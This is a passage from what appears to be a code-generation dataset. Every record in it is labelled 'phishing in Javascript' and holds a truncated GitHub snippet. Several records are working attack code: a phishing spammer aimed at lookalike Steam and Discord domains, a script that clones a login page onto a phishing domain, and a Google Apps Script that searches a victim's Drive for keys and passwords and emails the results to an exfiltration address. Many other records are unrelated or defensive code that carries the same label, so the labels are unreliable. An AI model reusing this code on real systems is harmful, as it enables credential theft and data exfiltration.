$('#'+_id+'_app').remove();\n $(this).parent().remove();\n if(!$('#multitask_bar li').length){\n closeMultitask(200);\n }\n })\n});\n\n$('.page.apps>li,#dock li').live('mousedown mouseup', function(event) {\n if (event.type == 'mousedown') {\n $(this).addClass('mousedown');\n if (!$('#drag').is('.ui-draggable-dragging') && !$('body').is('.editMode')) {\n can_run_apps = true;\n intervall = setTimeout(edit_mode, '1000');\n }else if($(this).hasClass('folder') && $('body').is('.editMode')){\n openFolder($(this).attr('id",
"language":"Javascript",
"repo_name":"altryne\/Ipad-Simulator",
"timestamp":"2025-05-22T22:01:01.825080",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/*\r\n * Copyright (c) 2021, Atheropids. All rights reserved.\r\n * \r\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n * SOFTWARE.\r\n *\/\r\n\r\n'use strict';\r\n\r\nconst https = require('https');\r\nconst readline = require('readline');\r\nconst tough = require('tough-cookie');\r\n\r\n\/\/ Spec holder class. Please see comments of member variables for details.\r\nclass PhishingServer {\r\n constructor(__domain, __entry_path = '\/', __login_page = '\/home\/login', __login_inbox = '\/login\/dologin') {\r\n\r\n \/\/ Target C&C server domain name.\r\n this.target_domain = __domain;\r\n\r\n \/\/ Remote path for server cookie init.\r\n this.entry_path = __entry_path;\r\n\r\n \/\/ Remote path of the phishing page.\r\n this.phishing_page_path = __login_page;\r\n\r\n \/\/ Remote path of the phishing data receiver.\r\n this.phishing_target_path = __login_inbox;\r\n }\r\n}\r\n\r\n\/*\r\n * Settings are here c:\r\n * Modify them on your purpose.\r\n *\/\r\n\r\n\/\/ List of malicious servers.\r\nlet spam_targets = [\r\n \/\/ [seized operation] new PhishingServer('steamcomrninuty.ru'),\r\n \/\/ [seized operation] new PhishingServer('steamcommnunmity.com', '\/id\/zxayonax'),\r\n \/\/ [seized operation] new PhishingServer('nitro-discord.ru', '\/airdrop'),\r\n \/\/ [seized operation] new PhishingServer('steamcommunity.link'),\r\n \/\/ [seized operation] new PhishingServer('discorcl.link'),\r\n new PhishingServer('steamcommmunilty.com', '\/tradoffer\/new\/?partner=406482431&token=lfk938iK'),\r\n new PhishingServer('discorrd.ru'),\r\n new PhishingServer('free-nitroos.ru'),\r\n new PhishingServer('discod.info', '\/nitro-gift'),\r\n new PhishingServer('d",
"language":"Javascript",
"repo_name":"Atheropids\/SteamComrninuty-Phish-Spammer",
"timestamp":"2025-05-22T22:01:02.005822",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"module.exports = [\n '2015',\n '2016',\n '2017',\n '2018',\n '2019',\n '2020',\n 'abuse',\n 'academy',\n 'accessibility',\n 'account',\n 'accountant',\n 'accounting',\n 'accountmanager',\n 'accountmanagers',\n 'accounts',\n 'accountspayable',\n 'acquisition',\n 'admin',\n 'admin1',\n 'administracao',\n 'administracion',\n 'administrador',\n 'administratie',\n 'administratif',\n 'administration',\n 'administrativo',\n 'administrator',\n 'administrators',\n 'admins',\n 'adminteam',\n 'admissions',\n 'adops',\n 'ads',\n 'adventure',\n 'advertise',\n 'advertising',\n 'advertisingsales',\n 'advice',\n 'advisor',\n 'advisors',\n 'adwords',\n 'affiliate',\n 'affiliates',\n 'agence',\n 'agencia',\n 'agency',\n 'agents',\n 'alarm',\n 'alarms',\n 'alert',\n 'alerts',\n 'alexa',\n 'all',\n 'all-employees',\n 'all-pms',\n 'all-staff',\n 'all-team',\n 'all-users',\n 'all.employees',\n 'all.staff',\n 'all.users',\n 'all_staff',\n 'alla',\n 'alle',\n 'allemployees',\n 'allhands',\n 'allsales',\n 'allstaff',\n 'allstudents',\n 'allteachers',\n 'allteam',\n 'allusers',\n 'alpha',\n 'alphas',\n 'alumni',\n 'ambassadors',\n 'amministrazione',\n 'analysts',\n 'analytics',\n 'android',\n 'angels',\n 'animation',\n 'announce',\n 'announcements',\n 'ap',\n 'api',\n 'app',\n 'apple',\n 'application',\n 'applications',\n 'apply',\n 'appointments',\n 'apps',\n 'archives',\n 'asistente',\n 'asset',\n 'assistanthead',\n 'assistencia',\n 'assistenza',\n 'associates',\n 'associates-all',\n 'ateam',\n 'atencionalcliente',\n 'atendimento',\n 'auctions',\n 'available',\n 'backend',\n 'backend-dev',\n 'backup',\n 'bd',\n 'benefits',\n 'berlin',\n 'bestellung',\n 'beta',\n 'biblioteca',\n 'bibliotheque',\n 'billing',\n 'bills',\n 'biuro',\n 'biz',\n 'bizdev',\n 'blog',\n 'board',\n 'bod',\n 'bookclub',\n 'booking',\n 'bookings',\n 'boston',\n 'boxoffice',\n 'brand',\n 'branding',\n 'brands',\n 'brandsolutions',\n 'broadcast',\n 'buchhaltung',\n 'bugs',\n 'build',\n 'bursar',\n 'busdev',\n 'business',",
"language":"Javascript",
"repo_name":"decal\/werdlists",
"timestamp":"2025-05-22T22:01:02.114023",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"page_src = \"https:\/\/login.vulnwebsite.com\/\";\nphishing_url=\"http:\/\/yourphishingdomain.com\/\";\n\nfunction doHTMLMagic(pageSource, baseURL, phishDomain) {\n\treplaceSrc = pageSource.replace('href=\"\/', \"href=\\\"\" + baseURL+ '\/');\n\treplaceSrc = replaceSrc.replace('src=\"\/', \"src=\\\"\" + baseURL+ '\/');\n\treplaceSrc = replaceSrc.replace('<head>', '<head><base href=\"' + phishDomain + '\">');\n\treturn replaceSrc;\n}\n\nfunction createCORSRequest(method, url) {\n var xhr = new XMLHttpRequest();\n if (\"withCredentials\" in xhr) {\n xhr.open(method, url, true);\n } else if (typeof XDomainRequest != \"undefined\") {\n xhr = new XDomainRequest();\n xhr.open(method, url);\n } else {\n xhr = null;\n }\n return xhr;\n}\n\nfunction makeCorsRequest(baseURL, phishDomain) {\n var url = 'https:\/\/cors-anywhere.herokuapp.com\/' + baseURL;\n\n var xhr = createCORSRequest('GET', url);\n if (!xhr) {\n return;\n }\n\n xhr.onload = function() {\n var pageSourceStr = doHTMLMagic(xhr.responseText, baseURL, phishDomain)\n \tdocument.open();\n document.write(pageSourceStr);\n document.close();\n };\n\n xhr.send();\n}\n\nmakeCorsRequest(page_src, phishing_url);\nwindow.history.pushState(\"\", \"Login\", \"\/login\");",
"language":"Javascript",
"repo_name":"infosec-au\/phishJS",
"timestamp":"2025-05-22T22:01:02.254176",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"const { Builder, By, until, Capabilities } = require(\"selenium-webdriver\")\nconst chrome = require(\"selenium-webdriver\/chrome\")\nconst url = require(\"url\")\nconst fs = require(\"fs\")\nconst crypto = require(\"crypto\")\nconst request = require(\"request\")\nconst path = require(\"path\")\nconst FormData = require(\"form-data\")\nconst proxy = require(\"selenium-webdriver\/proxy\")\nconst proxyChain = require(\"proxy-chain\")\nrequire('console-stamp')(console, {\n format: ':date(yyyy\/mm\/dd HH:MM:ss.l)'\n})\nrequire(\"dotenv\").config()\n\nconst extensionId = \"caacbgbklghmpodbdafajbgdnegacfmo\"\nconst CRX_URL = `https:\/\/clients2.google.com\/service\/update2\/crx?response=redirect&prodversion=98.0.4758.102&acceptformat=crx2,crx3&x=id%3D${extensionId}%26uc&nacl_arch=x86-64`\nconst USER_AGENT =\n \"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.102 Safari\/537.36\"\n\nconst USER = process.env.APP_USER || \"\"\nconst PASSWORD = process.env.APP_PASS || \"\"\nconst ALLOW_DEBUG = !!process.env.DEBUG?.length || false\nconst EXTENSION_FILENAME = \"app.crx\"\nconst PROXY = process.env.PROXY || undefined\n\nconsole.log(\"-> Starting...\")\nconsole.log(\"-> User:\", USER)\nconsole.log(\"-> Pass:\", PASSWORD)\nconsole.log(\"-> Proxy:\", PROXY)\nconsole.log(\"-> Debug:\", ALLOW_DEBUG)\n\nif (!USER || !PASSWORD) {\n console.error(\"Please set APP_USER and APP_PASS env variables\")\n process.exit()\n}\n\nif (ALLOW_DEBUG) {\n console.log(\n \"-> Debugging is enabled! This will generate a screenshot and console logs on error!\"\n )\n}\n\nasync function downloadExtension(extensionId) {\n const url = CRX_URL.replace(extensionId, extensionId)\n const headers = { \"User-Agent\": USER_AGENT }\n\n console.log(\"-> Downloading extension from:\", url)\n\n \/\/ if file exists and modify time is less than 1 day, skip download\n if (fs.existsSync(EXTENSION_FILENAME) && fs.statSync(EXTENSION_FILENAME).mtime > Date.now() - 86400000) {\n console.log(\"-> Extension already downloaded! skip download...\")\n return\n }\n\n return new ",
"language":"Javascript",
"repo_name":"web3bothub\/gradient-bot",
"timestamp":"2025-05-22T22:01:02.390815",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"const SCALES = { URGENCY: 5, CONFRIM: 6 };\nconst TOTALSCALE = 20;\nconst THRESH = 0.33;\n\nfunction emailCheck(email) {\n let scale = 0;\n let idx = email.lastIndexOf(\"@\");\n id = email.slice(0, idx);\n dmn = email.slice(idx + 1);\n len1 = id.length;\n len2 = dmn.length;\n \/\/ Check Email ID for Number Count >= 3\n idNums = id.replace(\/\\D\/g, \"\");\n if (idNums && idNums.length >= 3) scale += 2;\n \/\/ Check Email Domain for Number Count > 0\n dmnNums = dmn.replace(\/\\D\/g, \"\");\n if (dmnNums && dmnNums.length > 0) scale += 2;\n \/\/ Check Email Domain for Common Domain\n let found = DOMAINS.find(d => d === dmn);\n if (!found) scale += 1;\n return scale;\n}\n\nfunction URLcheck(body) {\n url = body.match(\n \/[-a-zA-Z0-9@:%._\\+~#=]{1,256}\\.[a-zA-Z0-9()]{1,6}\\b([-a-zA-Z0-9()@:%_\\+.~#?&\/\/=]*)\/\n );\n if (url) return 2;\n return 0;\n}\n\nfunction greetingCheck(greeting) {\n let scale = 0;\n for (i = 0; i < 3; i++) {\n let found = GREETINGS.find(greet => greeting[i] === greet);\n if (found) scale += 1;\n if (scale > 1) return 2;\n }\n return scale;\n}\n\nfunction urgencyCheck(word) {\n let found = URGENCY_WORDS.find(w => w === word);\n if (found) return 5 \/ 3;\n return 0;\n}\n\nfunction confirmCheck(word) {\n let found = CONFIRMING_WORDS.find(w => w === word);\n if (found) return 2;\n return 0;\n}\n\nfunction dictionaryCheck(body) {\n body = body\n .replace(\/[.,'\\\/#!$%\\^&\\*;:{}=\\-_`~()]\/g, \"\")\n .replace(\/\\r?\\n|\\r\/g, \" \"); \/\/ Remove special chars\n let words = body.split(\" \");\n words = words.filter(w => Boolean(w)); \/\/Remove falsey values\n let greeting = words.splice(0, 3);\n let grtScale = greetingCheck(greeting);\n let urgScale = 0;\n let cfmScale = 0;\n words.forEach(word => {\n if (urgScale < SCALES.URGENCY) urgScale += urgencyCheck(word);\n if (cfmScale < SCALES.CONFRIM) cfmScale += confirmCheck(word);\n });\n return { grtScale, urgScale, cfmScale };\n}\n\nfunction phishCheck(email, body) {\n let eScale = emailCheck(email);\n let urlScale = URLcheck(body);\n let dictScale = dic",
"language":"Javascript",
"repo_name":"PhishersOfMen\/Assn5-Phishing-SQLI",
"timestamp":"2025-05-22T22:01:02.523095",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"#!\/usr\/bin\/env node\nconst fs = require('fs');\nconst debug = require('debug')('fuzz:main');\nconst Promise = require('bluebird');\nconst program = require('commander');\nconst request = require('request');\nconst libssdeep = require('ssdeep');\nconst csv = require('csv');\nconst ProgressBar = require('progress');\nconst CONF = require('.\/config');\nconst { printError, printInfo, printResult, printBanner, parseTarget, bye } = require('.\/lib\/utils');\nconst { DomainFuzz, DomainDict, DomainThread } = require('.\/lib');\n\nconst fuzz = (opts, domains, worker) => {\n const total = domains.length;\n const bar = new ProgressBar('Running [:bar] :percent :etas', {\n complete: '=',\n incomplete: ' ',\n width: 50,\n total,\n });\n Promise\n .map(domains, (domain) => {\n bar.tick(1);\n return worker.run(domain);\n }, { concurrency: opts.concurrency })\n .then((result) => {\n if (opts.option_output) {\n let data;\n if (opts.option_format === 'JSON') {\n data = JSON.stringify(result, null, 4);\n fs.appendFile(opts.option_output, data, 'utf8', (err) => {\n if (err) printError(err.message);\n });\n } else if (opts.option_format === 'CSV') {\n data = [];\n const columns = 'fuzzer,domain-name,dns-a,dns-aaaa,dns-mx,dns-ns,geoip-country,whois-created,whois-updated,ssdeep-score';\n data.push(columns.split(','));\n for (const domain of result) {\n data.push(columns.split(',').map(_ => domain[_]));\n }\n csv.stringify(data, (parseErr, res) => {\n fs.appendFile(this.option_output, res, 'utf8', (err) => {\n if (err) printError(err.message);\n });\n });\n }\n }\n for (const domain of result) {\n printResult(domain);\n }\n })\n .catch(err => printError(err.message));\n};\n\nconst main = () => {\n const opts = program\n .version(CONF.version)\n .usage('[options] DOMAIN')\n .description(`Find similar-loo",
"language":"Javascript",
"repo_name":"monkeym4ster\/DomainFuzz",
"timestamp":"2025-05-22T22:01:02.651975",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"const fs = require(\"fs\");\n\n\/\/ load puppeteer\nconst puppeteer = require('puppeteer');\n\nconst window_height = 768;\nconst window_width = 1366;\nconst studio_url = \"https:\/\/studio.youtube.com\/\";\n\n\/\/ directory contains the videos you want to upload\nconst upload_file_directory = \"your video directory\";\n\/\/ change user data directory to your directory\nconst chrome_user_data_directory = \"C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Chromium\\\\User Data\";\n\nconst title_prefix = \"video title prefix \";\nconst video_description = \"\";\n\nconst DEFAULT_ARGS = [\n '--disable-background-networking',\n '--enable-features=NetworkService,NetworkServiceInProcess',\n '--disable-background-timer-throttling',\n '--disable-backgrounding-occluded-windows',\n '--disable-breakpad',\n '--disable-client-side-phishing-detection',\n '--disable-component-extensions-with-background-pages',\n '--disable-default-apps',\n '--disable-dev-shm-usage',\n '--disable-extensions',\n \/\/ BlinkGenPropertyTrees disabled due to crbug.com\/937609\n '--disable-features=TranslateUI,BlinkGenPropertyTrees',\n '--disable-hang-monitor',\n '--disable-ipc-flooding-protection',\n '--disable-popup-blocking',\n '--disable-prompt-on-repost',\n '--disable-renderer-backgrounding',\n '--disable-sync',\n '--force-color-profile=srgb',\n '--metrics-recording-only',\n '--no-first-run',\n '--enable-automation',\n '--password-store=basic',\n '--use-mock-keychain',\n];\n\nlet files = [];\nfs.readdir(upload_file_directory, function (err, temp_files) {\n if (err) {\n console.log('Something went wrong...');\n return console.error(err);\n }\n for (let i = 0; i < temp_files.length; i++) {\n files.push(temp_files[i]);\n }\n});\n\ntry {\n (async () => {\n const browser = await puppeteer.launch(\n {\n 'headless': false, \/\/ have window\n executablePath: null,\n userDataDir: chrome_user_data_directory,\n ignoreDefaultArgs: ",
"language":"Javascript",
"repo_name":"last2win\/youtube-upload-multi-videos",
"timestamp":"2025-05-22T22:01:02.782934",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"import warning from '.\/station.svg'\nimport terra from '.\/terra.svg'\nimport '.\/fonts.css'\nimport '.\/App.css'\n\nconst SAFE_PAGE = 'https:\/\/station.money'\n\nfunction App() {\n if (!document.referrer || document.referrer === window.location.href) {\n \/\/window.location.href = SAFE_PAGE\n }\n\n if (document.referrer) {\n const { hostname } = new URL(document.referrer)\n if (hostname === 'terra.money' || hostname.endsWith('.terra.money')) {\n return (\n <div className='app__terra'>\n <img src={terra} alt='Terra logo' \/>\n <h2>WARNING<\/h2>\n <p>\n <span className='url'>{hostname}<\/span> is currently\n unavailable. <br \/> Please visit{' '}\n <span className='url'>\n <a href='https:\/\/twitter.com\/terra_money'>\n twitter.com\/terra_money\n <\/a>\n <\/span>{' '}\n for updates.\n <\/p>\n <\/div>\n )\n }\n }\n\n return (\n <div className='App'>\n <img src={warning} alt='warning' \/>\n <h2>PHISHING ALERT<\/h2>\n <p>\n You are trying to visit <span className='url'>{document.referrer}<\/span>\n <br \/>\n which is a known scam website.\n <\/p>\n <span\n onClick={() => {\n window.location.href = SAFE_PAGE\n }}\n className='button__main'\n >\n Go back to safety\n <\/span>\n {\/*\n <a\n href={document.referrer}\n >\n Visit anyway\n <\/a>\n *\/}\n <\/div>\n )\n}\n\nexport default App\n",
"language":"Javascript",
"repo_name":"terra-money\/scam-alert-web",
"timestamp":"2025-05-22T22:01:02.912967",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"const fs = require('fs')\nconst fsExtra = require('fs-extra')\nconst rmRf = require('rimraf')\n\nconst Streams = require('mississippi')\nconst bind = require('ap').partial\nconst async = require('.\/async')\n\nconst Browserify = require('browserify')\nconst watchify = require('watchify')\nconst sassStream = require('sass-css-stream')\n\n\n\n\nstart(function(err){\n if (err) throw err\n console.log('end')\n})\n\n\nfunction start(cb){\n async.series({\n clean,\n build,\n }, cb)\n}\n\nfunction clean(cb){\n fsExtra.remove('.\/dist\/', cb)\n}\n\nfunction build(cb){\n async.parallel({\n buildJs,\n buildCss,\n buildStatic,\n }, cb)\n}\n\nfunction buildJs(cb) {\n var browserify = Browserify({\n entries: ['.\/src\/js\/index.js'],\n cache: {},\n packageCache: {},\n \/\/ plugin: [watchify],\n })\n\n browserify.on('update', bundle)\n\n async.series({\n buildJsPrep: bind(fsExtra.mkdirs, '.\/dist\/js'),\n buildJsStart: start,\n }, cb)\n\n function start(cb){\n var firstBundle = bundle()\n Streams.finished(firstBundle, cb)\n }\n\n function bundle() {\n console.log('bundle')\n return Streams.pipeline(\n browserify.bundle(),\n fs.createWriteStream('.\/dist\/js\/bundle.js')\n )\n }\n}\n\nfunction buildCss(cb) {\n\n async.series({\n buildCssPrep: bind(fsExtra.mkdirs, '.\/dist\/css'),\n buildCssStart: start,\n }, cb)\n\n function start(cb) {\n var pipeline = Streams.pipeline(\n fs.createReadStream( '.\/src\/css\/index.scss' ),\n sassStream( '.\/src\/css\/index.scss' ),\n fs.createWriteStream( '.\/dist\/css\/bundle.css' )\n )\n Streams.finished(pipeline, cb)\n }\n}\n\nfunction buildStatic(cb) {\n\n async.parallel({\n imgs: bind(fsExtra.copy, '.\/src\/img\/', '.\/dist\/img\/'),\n faviconAndroid: bind(fsExtra.copy, '.\/src\/manifest.json', '.\/dist\/manifest.json'),\n faviconIE: bind(fsExtra.copy, '.\/src\/browserconfig.xml', '.\/dist\/browserconfig.xml'),\n fonts: bind(fsExtra.copy, '.\/src\/fonts\/', '.\/dist\/fonts\/'),\n index: bind(fsExtra.copy, '.\/src\/index.html'",
"language":"Javascript",
"repo_name":"409H\/landing",
"timestamp":"2025-05-22T22:01:03.059650",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"\/\/ Created by Greg Carson @ Feb 2017\n\/\/ ---------------------------------------\n\/\/ Play nice and use for security training\n\/\/ and testing.\n\nfunction drivePassSearch() {\n \n \/\/ This creates a PUBLICALLY AVAILABLE RWX FOLDER in Drive under the executing users context.\n \/\/ This can be disabled for Google Apps for Business users:\n \/\/ https:\/\/support.google.com\/a\/answer\/60781?hl=en\n \/\/ Personal users shit out of luck? Not sure haven't looked into it.\n \n var folder = DriveApp.createFolder('Evil Folder');\n folder.setSharing(DriveApp.Access.ANYONE, DriveApp.Permission.EDIT);\n \n \/\/ Construct malicious search query on drive. Look for PDFs? DOC\/XLS files? If you are looking for an extension use 'title contains'\n \/\/ If you want to search through content for a keyword use 'fullText contains' instead\n \/\/ You can construct more complex queries using logical operators, for example: 'and (mimeType contains 'image\/' or mimeType contains 'video\/')'\n \/\/ Not aware of case sensitivity or ability to perform regular expressions\n \/\/ Search Ideas? title contains .cer .pem .der .crt .pub id_rsa .docx .xlsx .vsd password .nessus ntds.dit \n \/\/ or fullText contains password or any other combination of keywords of interest such as target individuals, target servers, etcetera\n \n var files = DriveApp.searchFiles(\n 'modifiedDate > \"2013-02-28\" and title contains \"SEARCHTERMHERE\"');\n while (files.hasNext()) {\n var file = files.next();\n Logger.log(file.getDownloadUrl());\n Logger.log(file.getUrl());\n Logger.log(file.getName());\n var name = file.getName();\n file.makeCopy(name,folder);\n Logger.log(file.getDownloadUrl());\n Logger.log(file.getUrl());\n \n }\n\n \/\/ Write Logger data to body of email and send to specified recipient\n \/\/ Sender address is the current active user\n \n Logger.log(folder.getUrl());\n var recipient = \"RECPIENT-EXFIL-EMAIL-ADDRESS-HERE\";\n var subject = 'Google Drive Query - KDBX';\n var body = Logger.getLog();\n MailApp.sendEmail(recipient, subj",
"language":"Javascript",
"repo_name":"gregkcarson\/GoogleAppScriptSE",
"timestamp":"2025-05-22T22:01:03.220189",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"const express = require(\"express\");\nconst app = express();\nconst http = require(\"http\");\nconst server = http.createServer(app);\nconst puppeteer = require('puppeteer');\nconst port = 9001;\nvar browser;\napp.use(express.json())\napp.post('\/bot\/url', function(req, res) {\n res.setHeader('Content-Type', 'application\/json');\n console.log(req.body);\n let url = req.body.url\n console.log(url);\n startBot(url)\n .then(() => {\n res.send({\n message: 'success',\n data: req.body\n })\n })\n .catch((err) => {\n res.send({\n message: 'failed',\n error: err\n })\n })\n})\nasync function startBot(url) {\n console.log(browser);\n if(typeof browser !== 'undefined'){\n await browser.close()\n }\n const minimal_args = [\n '--autoplay-policy=user-gesture-required',\n '--disable-background-networking',\n '--disable-background-timer-throttling',\n '--disable-backgrounding-occluded-windows',\n '--disable-breakpad',\n '--disable-client-side-phishing-detection',\n '--disable-component-update',\n '--disable-default-apps',\n '--disable-dev-shm-usage',\n '--disable-domain-reliability',\n '--disable-extensions',\n '--disable-features=AudioServiceOutOfProcess',\n '--disable-hang-monitor',\n '--disable-ipc-flooding-protection',\n '--disable-notifications',\n '--disable-offer-store-unmasked-wallet-cards',\n '--disable-popup-blocking',\n '--disable-print-preview',\n '--disable-prompt-on-repost',\n '--disable-renderer-backgrounding',\n '--disable-setuid-sandbox',\n '--disable-speech-api',\n '--disable-sync',\n '--hide-scrollbars',\n '--ignore-gpu-blacklist',\n '--metrics-recording-only',\n '--mute-audio',\n '--no-default-browser-check',\n '--no-first-run',\n '--no-pings',\n '--no-sandbox',\n '--no-zygote',\n '--password-store=basic',\n '--use-gl=swiftshader',\n '--use-mock-keychain',\n ];\n console.log(\"Launching Headless Browser::::::::::::\");\n browser = await puppeteer.launch({\n ",
"language":"Javascript",
"repo_name":"arunjohn96\/webndi",
"timestamp":"2025-05-22T22:01:03.383520",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"import React from 'react';\nimport {\n Route,\n Switch\n} from 'react-router-dom';\n\n\nconst isBrowser = typeof window !== \"undefined\" && typeof window.document !== \"undefined\";\nconst dummy = () => {};\n\n\nconst HelpTextPage = isBrowser? React.lazy(() => import(\".\/components\/helpText\")): dummy;\nconst WebhookPage = isBrowser? React.lazy(() => import(\".\/pages\/guild_dashboard\/server_view\")): dummy;\nconst ManagerRootPage = isBrowser? React.lazy(() => import(\".\/pages\/emote_manager\/manager_root\")): dummy;\nconst LoginPage = isBrowser? React.lazy(() => import(\".\/pages\/login\")): dummy;\nconst InvitePage = isBrowser? React.lazy(() => import(\".\/pages\/invite\")): dummy;\nconst PrivacyPolicy = isBrowser? React.lazy(() => import(\".\/pages\/policy\")): dummy;\nconst GuildCreatorPage = isBrowser? React.lazy(() => import(\".\/pages\/guild_builder\/guild_builder\")): dummy;\nconst GuildSelectorPage = isBrowser? React.lazy(() => import(\".\/pages\/guild_builder\/guild_selector\")): dummy;\nconst GuildStatusPage = isBrowser? React.lazy(() => import(\".\/pages\/guild_builder\/guild_status\")): dummy;\nconst LicensePage = isBrowser? React.lazy(() => import(\".\/pages\/licenses\")): dummy;\nconst CommandPage = isBrowser? React.lazy(() => import(\".\/pages\/commands\")): dummy;\nconst BotAddedPage = isBrowser? React.lazy(() => import(\".\/pages\/bot_added\")): dummy;\nconst PremiumPage = isBrowser? React.lazy(() => import(\".\/pages\/premium\")): dummy;\nconst PublicPackSearchPage = isBrowser? React.lazy(() => import(\".\/pages\/public_packs\/search\")): dummy;\nconst PublicPackPage = isBrowser? React.lazy(() => import(\".\/pages\/public_packs\/view\")): dummy;\nconst PhishingPage = isBrowser? React.lazy(() => import(\".\/pages\/phishing\")): dummy;\nconst TermsPage = isBrowser? React.lazy(() => import(\".\/pages\/terms\")): dummy;\n\n\nexport const FullRouter = ({loggedIn, HomePage}) => {\n return (\n <React.Suspense fallback={<div>Loading Page...<\/div>}>\n {!loggedIn && <LoggedOutRouter HomePage={HomePage}\/>}\n {loggedIn && <LoggedInRouter HomePage={H",
"language":"Javascript",
"repo_name":"NQN-Discord\/NQNFrontend",
"timestamp":"2025-05-22T22:01:03.529662",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
"sample_solution":"const maxConfigItems = 600\r\nconst maxPerType = 300\r\nconst includeOriginalConfigs = 0\r\n\r\nconst subLinks = [\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2ray-Configs\/main\/Splitted-By-Protocol\/trojan.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2ray-Configs\/main\/Splitted-By-Protocol\/ss.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2Hub\/main\/Split\/Base64\/shadowsocks\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2Hub2\/main\/Split\/Base64\/vmess\",\r\n \"https:\/\/raw.githubusercontent.com\/NiREvil\/vless\/main\/sub\/freedom\"\r\n]\r\nconst cnfLinks = [\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2ray-Configs\/main\/Splitted-By-Protocol\/vmess.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2rayCollector\/main\/vmess_iran.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2rayCollector\/main\/trojan_iran.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2rayCollector\/main\/ss_iran.txt\"\r\n]\r\nconst cleanIPLink = \"https:\/\/raw.githubusercontent.com\/coldwater-10\/clash_rules\/main\/List%20of%20clean%20IPs.txt\"\r\nconst operatorList = [\"AST\", \"HWB\", \"IRC\", \"MBT\", \"MCI\", \"MKB\", \"PRS\", \"RTL\", \"SHT\", \"ZTL\", \"PIS\", \"DAT\", \"SAB\", \"ASR\", \"FAN\", \"ZTL\", \"SFR\", \"DID\", \"LAY\", \"MAH\", \"TAK\", \"PET\", \"AND\", \"RES\", \"AFR\", \"ARA\", \"SAM\", \"APT\", \"ALL\", \"PLUS\", \"TEST\", \"ENG\", \"FA\", \"IPV6\", \"IRCF\", \"ANTY\"]\r\nconst addressList = [\"discord.com\", \"cloudflare.com\", \"nginx.com\", \"cdnjs.com\", \"vimeo.com\", \"networksolutions.com\"]\r\nconst fpList = [\"chrome\", \"chrome\", \"chrome\", \"firefox\", \"safari\", \"edge\", \"ios\", \"android\", \"360\", \"qq\", \"random\", \"random\"]\r\nconst alpnList = [\"http\/1.1\", \"h2,http\/1.1\", \"h2,http\/1.1\", \"h2,http\/1.1\"]\r\nvar cleanIPs = []\r\n\r\nexport default {\r\n async fetch(request) {\r\n var url = new URL(request.url)\r\n var pathParts = url.pathname.replace(\/^\\\/|\\\/$\/g, \"\").split(\"\/\")\r\n var type = pathParts[0].toLowerCase()\r\n if ([\"sub\", \"clash\"].includes(type)) {\r\n if (pathParts[1] !== undefined) {\r\n var operator = pathParts[1].toUppe",
"language":"Javascript",
"repo_name":"NiREvil\/workers-cloudflare",
"timestamp":"2025-05-22T22:01:03.663874",
"split":"training"
},
{
"task":"code_generation",
"problem_title":"phishing in Javascript",
"problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
